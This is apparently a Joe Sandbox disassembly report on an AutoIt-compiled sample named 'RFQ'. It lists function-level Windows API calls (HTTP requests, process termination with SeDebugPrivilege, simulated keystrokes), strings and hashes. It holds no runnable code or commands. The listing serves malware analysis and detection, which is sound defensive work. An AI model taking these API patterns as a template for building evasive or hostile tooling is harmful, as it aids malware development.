• String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
• API String ID: 1256254125-1994484594
• Opcode ID: 7dbac9f6eedff2be813590c57f4d3370fc097222b1d222c963ff2c0f45889310
• Instruction ID: 20071bd6ec2ab22ad676a715f876e2560d3270fffebd428ea53ba3d5b53db07f
• Opcode Fuzzy Hash: 7dbac9f6eedff2be813590c57f4d3370fc097222b1d222c963ff2c0f45889310
• Instruction Fuzzy Hash: 2541E232B163A28B8B14DE7BC8D44BA73E3BF95710B60062DE48197785EF61DE09C791
APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,006B5B33,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 006B5400
• __fassign.LIBCMT ref: 006B547B
• __fassign.LIBCMT ref: 006B5496
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 006B54BC
• WriteFile.KERNEL32(?,FF8BC35D,00000000,3[k,00000000,?,?,?,?,?,?,?,?,?,006B5B33,?), ref: 006B54DB
• WriteFile.KERNEL32(?,?,00000001,3[k,00000000,?,?,?,?,?,?,?,?,?,006B5B33,?), ref: 006B5514
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID: 3[k
• API String ID: 1324828854-1514389140
• Opcode ID: 8ab0f3a64d515eae8c30a5c58c0beaff265117c5a48cb2f636679c36bdf8dcef
• Instruction ID: 66734b98c8c2404f07fb120e93ddb65f80c4cc6780ccea12fdec7e6462d4bdb2
• Opcode Fuzzy Hash: 8ab0f3a64d515eae8c30a5c58c0beaff265117c5a48cb2f636679c36bdf8dcef
• Instruction Fuzzy Hash: FF51F9B1A00249AFDB20CFA8D841BEEBBF6FF09301F14415AE556E7391D7309981CB54
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006F3502
  • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
• LoadStringW.USER32(?,?,00000FFF,?), ref: 006F3528
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-2391861430
• Opcode ID: c98f55d2ea9fd5997148a77ba86fcaf0ad3026ef58ffc1e2bc61a7e618a16e3e
• Instruction ID: 2c8c56f89b107556b88c82d0ccfb467c56d0dec506ce6dd2fecf3c127811d520
• Opcode Fuzzy Hash: c98f55d2ea9fd5997148a77ba86fcaf0ad3026ef58ffc1e2bc61a7e618a16e3e
• Instruction Fuzzy Hash: 04517E71800219ABCF54FBE0CC52EEEBB36AF14301F044229F505722A1EB745B99DF69
Similarity
• API ID: _wcslen
• String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
• API String ID: 176396367-1994484594
• Opcode ID: ae1849c71f0464b2fc6ab64c9442588b54f50709c78159f1113ee42a3b9da5a0
• Instruction ID: 88318c82fe8667e5ff2e9608522a5d2e5cb543dcf5fd89ac7865478064ce940d
• Opcode Fuzzy Hash: ae1849c71f0464b2fc6ab64c9442588b54f50709c78159f1113ee42a3b9da5a0
• Instruction Fuzzy Hash: 3C41DF32B063A28B8B249E7B89D04BB73E3AF95714B60052DE48197785FF20DD0987A1
APIs
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?), ref: 00718D0F
  • Part of subcall function 00717D90: IsWindow.USER32(01355690), ref: 00717E29
  • Part of subcall function 00717D90: IsWindowEnabled.USER32(01355690), ref: 00717E35
• GetMenuItemInfoW.USER32(?,?,?,?), ref: 00718DC1
• GetMenuItemCount.USER32(?), ref: 00718DDE
• GetMenuItemID.USER32(?), ref: 00718DEE
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00718E20
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00718E62
• CheckMenuRadioItem.USER32(?,?,?,?,00000400), ref: 00718E93
Similarity
• API ID: ItemMenu$Info$Window$CheckCountEnabledProcRadio
• String ID: 0
• API String ID: 4045175071-4108050209
• Opcode ID: 04b6e3d71d8c673f0e6109c877dddd93c39175536b0d9eea208ca518beec63c0
• Instruction ID: b7c220ca8e4e3148dc16418e4c524bbf67a1ac3f4b4061234db718b324859092
• Opcode Fuzzy Hash: 04b6e3d71d8c673f0e6109c877dddd93c39175536b0d9eea208ca518beec63c0
• Instruction Fuzzy Hash: 4651B0716043019FD750CF18D888AEBBBE8FF88754F04495DF994A7191CB79E988CBA2
APIs
  • Part of subcall function 006E3F58: CharUpperBuffW.USER32(?,?,00000000,0071D0D0,?,?,00000001,?,?,006E4286,?,?,?,?,00000000,0071D0D0), ref: 006E3FE5
• _wcslen.LIBCMT ref: 006E4296
• _wcslen.LIBCMT ref: 006E42F0
• _wcslen.LIBCMT ref: 006E4337
• _wcslen.LIBCMT ref: 006E437B
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
• API String ID: 1256254125-1994484594
• Opcode ID: c81c1a8d2d462248e74899fec792f45ff5be1a7802d48ce40e1f9b3d78dd7e9d
• Instruction ID: f46690bea7cab10e09af2e28926faf7ae87c25ef86e6cea4b97261e24bb0bb18
• Opcode Fuzzy Hash: c81c1a8d2d462248e74899fec792f45ff5be1a7802d48ce40e1f9b3d78dd7e9d
• Instruction Fuzzy Hash: C041F332B063A28B8B149E7BC5C44BB77E3BF95710B60052DE48197745EF20ED058BA0
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006FC190
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006FC1B8
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006FC1E8
• GetLastError.KERNEL32 ref: 006FC240
• SetEvent.KERNEL32(?), ref: 006FC254
• InternetCloseHandle.WININET(00000000), ref: 006FC25F
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: 05063c540a017bdb1981fda31718f337b29110019d2cc15c2358ee3aff6963a7
• Instruction ID: 37a493dec1997ffe05f69f7b9fe50bc8ba89a74c217ebf6cc4e66d790d6b3cdd
• Opcode Fuzzy Hash: 05063c540a017bdb1981fda31718f337b29110019d2cc15c2358ee3aff6963a7
• Instruction Fuzzy Hash: 74319F7150020CAFD7229FA88D89ABB7BFDFF49760B14851EF54692240DB34EE059B64
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006C47E6,?,?,Bad directive syntax error,0071D0D0,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 006E97DA
• LoadStringW.USER32(00000000,?,006C47E6,?), ref: 006E97E1
  • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006E98A5
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
• Opcode ID: 45c4ef6fde95d094e251007fb5dea1f70abd2702a8f526ea648d03f286b970e4
• Instruction ID: 31c4187d9a14346e0304614939e8e67774ce643127480a372babf10de90e74ce
• Opcode Fuzzy Hash: 45c4ef6fde95d094e251007fb5dea1f70abd2702a8f526ea648d03f286b970e4
• Instruction Fuzzy Hash: 6D219C7180021AEBCF11BF94CC4AEEE773ABF19300F04442AF516620A2EB759618DF65
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d05c7c094e73a9039c4669c9c0e6e27a10777e2e1820ac6090340a38207de07c
• Instruction ID: 540ee354c60157ae1c8e83680f54174bee10837f1d05515865d553bf8606c118
• Opcode Fuzzy Hash: d05c7c094e73a9039c4669c9c0e6e27a10777e2e1820ac6090340a38207de07c
• Instruction Fuzzy Hash: E8C1E3B4A043459FDB51EFE8D841BEDBBBAAF1A310F08419DE514A7392CB348981CF65
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 006876D0
                                                                            • GetWindowRect.USER32(?,?), ref: 00687711
                                                                            • ScreenToClient.USER32(?,?), ref: 00687739
                                                                            • GetClientRect.USER32(?,?), ref: 0068787D
                                                                            • GetWindowRect.USER32(?,?), ref: 0068789E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$Screen
                                                                            • String ID:
                                                                            • API String ID: 1296646539-0
                                                                            • Opcode ID: 873936a25640d70319198ea8dab16d96ca4d27bd2b4c5417640045b0fd625492
                                                                            • Instruction ID: 529b87516056dd6cc6cf1b63af6346ace6871803ca3742b8864ebb19cc6127fb
                                                                            • Opcode Fuzzy Hash: 873936a25640d70319198ea8dab16d96ca4d27bd2b4c5417640045b0fd625492
                                                                            • Instruction Fuzzy Hash: FEC16C7590464AEFDB10DFA8C884BEDB7F2FF18310F24851AE896A3250D734E991DB60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                            • String ID:
                                                                            • API String ID: 1282221369-0
                                                                            • Opcode ID: 599c9a7fe5415377077f697bbb63d36187c67d5b4a84d5d3dc7b469a91d5132c
                                                                            • Instruction ID: a961ebe4148d7f72c682344071ed08f521ac2961581dc9b0d02bfe0979756910
                                                                            • Opcode Fuzzy Hash: 599c9a7fe5415377077f697bbb63d36187c67d5b4a84d5d3dc7b469a91d5132c
                                                                            • Instruction Fuzzy Hash: E1610BF1A04306AFDB20AFB498916FA7BEBEF01730F04416DF94497381DA359AC28794
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 007150BB
                                                                            • ShowWindow.USER32(?,00000000), ref: 007150FC
                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00715102
                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00715106
                                                                              • Part of subcall function 00716E88: DeleteObject.GDI32(00000000), ref: 00716EB4
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00715142
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0071514F
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00715182
                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 007151BC
                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 007151CB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                            • String ID:
                                                                            • API String ID: 3210457359-0
                                                                            • Opcode ID: 17115e6a3155e236a0d143118e19b934ffdcb38b6a5039b69b94c392b2908968
                                                                            • Instruction ID: 7e1298cc39c657fd2e16e6fcc0c9a17ad1d5c7fac39519647d2a63ec3ca09c92
                                                                            • Opcode Fuzzy Hash: 17115e6a3155e236a0d143118e19b934ffdcb38b6a5039b69b94c392b2908968
                                                                            • Instruction Fuzzy Hash: A2519530A40609FFEF299F7CCC4AFD93766EB48350F148115BA25961E1C77999D0AB81
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 006D72E3
                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006D72FC
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006D730C
                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 006D7324
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006D7345
                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,0069A05E,00000000,00000000,00000000,000000FF,00000000), ref: 006D7354
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006D7371
                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,0069A05E,00000000,00000000,00000000,000000FF,00000000), ref: 006D7380
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                            • String ID:
                                                                            • API String ID: 1268354404-0
                                                                            • Opcode ID: 8c08130700737989b715e5941ea9937932d50c5a71cb006e8b462a95425b4823
                                                                            • Instruction ID: 28188c8469e37483013574040a3b9561afa82955a6d3c6053221f0626bf1b7b2
                                                                            • Opcode Fuzzy Hash: 8c08130700737989b715e5941ea9937932d50c5a71cb006e8b462a95425b4823
                                                                            • Instruction Fuzzy Hash: DC517A30A40205AFDF20CFA9CC45FAA7BFAEB48750F108519F902976E0E774E990DB95
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006FC0A0
                                                                            • GetLastError.KERNEL32 ref: 006FC0B3
                                                                            • SetEvent.KERNEL32(?), ref: 006FC0C7
                                                                              • Part of subcall function 006FC171: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006FC190
                                                                              • Part of subcall function 006FC171: GetLastError.KERNEL32 ref: 006FC240
                                                                              • Part of subcall function 006FC171: SetEvent.KERNEL32(?), ref: 006FC254
                                                                              • Part of subcall function 006FC171: InternetCloseHandle.WININET(00000000), ref: 006FC25F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 337547030-0
                                                                            • Opcode ID: 985a0b215a03f484913e130367b573316b0f69eabed64c6add14aeb623a90d0b
                                                                            • Instruction ID: 0de334c49c5f30756eeb0f5579ded56d8a74d265c058d87399473ccece89c6cd
                                                                            • Opcode Fuzzy Hash: 985a0b215a03f484913e130367b573316b0f69eabed64c6add14aeb623a90d0b
                                                                            • Instruction Fuzzy Hash: CB31907110070DAFDB219FA8CD44AB6BBFAFF05320B04851DF65683651C735D825EB64
                                                                            APIs
                                                                              • Part of subcall function 006E3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 006E399F
                                                                              • Part of subcall function 006E3985: GetCurrentThreadId.KERNEL32 ref: 006E39A6
                                                                              • Part of subcall function 006E3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006E24F7), ref: 006E39AD
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E2501
                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006E251F
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 006E2523
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E252D
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006E2545
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 006E2549
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E2553
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006E2567
                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 006E256B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: 953c9f9433e1da6a15e6f7ad27f98a52c9863832d6ee3e73faf6ec07aee84698
                                                                            • Instruction ID: f6190287bc780fb96869773083ce8d8b85f287e07696e1af1008e3d92f7d64ac
                                                                            • Opcode Fuzzy Hash: 953c9f9433e1da6a15e6f7ad27f98a52c9863832d6ee3e73faf6ec07aee84698
                                                                            • Instruction Fuzzy Hash: E301B5303D0314BBFB1067A99C8AF957E5ADB8AB12F108055F314AF1D1C9E218449A6D
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,006E138D,?,?,00000000), ref: 006E1750
                                                                            • HeapAlloc.KERNEL32(00000000,?,006E138D,?,?,00000000), ref: 006E1757
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006E138D,?,?,00000000), ref: 006E176C
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,006E138D,?,?,00000000), ref: 006E1774
                                                                            • DuplicateHandle.KERNEL32(00000000,?,006E138D,?,?,00000000), ref: 006E1777
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006E138D,?,?,00000000), ref: 006E1787
                                                                            • GetCurrentProcess.KERNEL32(006E138D,00000000,?,006E138D,?,?,00000000), ref: 006E178F
                                                                            • DuplicateHandle.KERNEL32(00000000,?,006E138D,?,?,00000000), ref: 006E1792
                                                                            • CreateThread.KERNEL32(00000000,00000000,006E17B8,00000000,00000000,00000000), ref: 006E17AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: c1b37e1cc146175a63b93a4adafb6a1bf97d2ed8004bcdb48695bada98eb19b6
                                                                            • Instruction ID: 26dbcfc0384558d3de55f1d0205275b3362b9e5f041c29ff2146df38bf813489
                                                                            • Opcode Fuzzy Hash: c1b37e1cc146175a63b93a4adafb6a1bf97d2ed8004bcdb48695bada98eb19b6
                                                                            • Instruction Fuzzy Hash: 7401ACB52C0348BFE711ABA9DC49FA77BADEB89B11F01C411FA05DB191C67498009B64
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$pt
                                                                            • API String ID: 2610073882-758650727
                                                                            • Opcode ID: b474027cad668c6506fbb212e498666b6570586d3044f776d498db3c53864f60
                                                                            • Instruction ID: 4cb63beff3e35a45f909ddf8de691adcd870b4620e46e2823daf4044fe88ca7f
                                                                            • Opcode Fuzzy Hash: b474027cad668c6506fbb212e498666b6570586d3044f776d498db3c53864f60
                                                                            • Instruction Fuzzy Hash: 03919EB1A00219EBDF24CFA5C844FAEBBF8EF45714F108659F615AB180E7789944CF64
                                                                            APIs
                                                                              • Part of subcall function 006ED3FA: CreateToolhelp32Snapshot.KERNEL32 ref: 006ED41F
                                                                              • Part of subcall function 006ED3FA: Process32FirstW.KERNEL32(00000000,?), ref: 006ED42D
                                                                              • Part of subcall function 006ED3FA: CloseHandle.KERNEL32(00000000), ref: 006ED4FA
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070A094
                                                                            • GetLastError.KERNEL32 ref: 0070A0A7
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070A0DA
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0070A18F
                                                                            • GetLastError.KERNEL32(00000000), ref: 0070A19A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070A1EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: 2babbacbe9c4503b82b6890b91be24c8660424a898a767f2e5095a81da7cb4b5
                                                                            • Instruction ID: 723cb1cedbf9227347a89e772973b79254a9883efbaf8e0ee415a64653bcd4a7
                                                                            • Opcode Fuzzy Hash: 2babbacbe9c4503b82b6890b91be24c8660424a898a767f2e5095a81da7cb4b5
                                                                            • Instruction Fuzzy Hash: 8C616C71208341AFD720DF18C894F19BBE1AF54318F18859CE4668B7E2C77AED45CB96
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00713858
                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0071386D
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00713887
                                                                            • _wcslen.LIBCMT ref: 007138CC
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 007138F9
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00713927
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcslen
                                                                            • String ID: SysListView32
                                                                            • API String ID: 2147712094-78025650
                                                                            • Opcode ID: b5a80595bba0125cda6b9c0a638e64c34898bc56c0a893aa4d724ac5b9e2704a
                                                                            • Instruction ID: 6f12bbfdf353537ab2a98893f41e5a895570d59e461cb854081df065396f3688
                                                                            • Opcode Fuzzy Hash: b5a80595bba0125cda6b9c0a638e64c34898bc56c0a893aa4d724ac5b9e2704a
                                                                            • Instruction Fuzzy Hash: E541C571900219ABEB219F68CC49FEA7BA9FF08350F104525F958E72C1D779ED84CB90
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006EBC1B
                                                                            • IsMenu.USER32(00000000), ref: 006EBC3B
                                                                            • CreatePopupMenu.USER32 ref: 006EBC71
                                                                            • GetMenuItemCount.USER32(01355870), ref: 006EBCC2
                                                                            • InsertMenuItemW.USER32(01355870,?,00000001,00000030), ref: 006EBCEA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                            • String ID: 0$2
                                                                            • API String ID: 93392585-3793063076
                                                                            • Opcode ID: 77e17db8bc1bd91d4f462b4741b11cacb8ad7c9d2b564e2e53a4838a6d469423
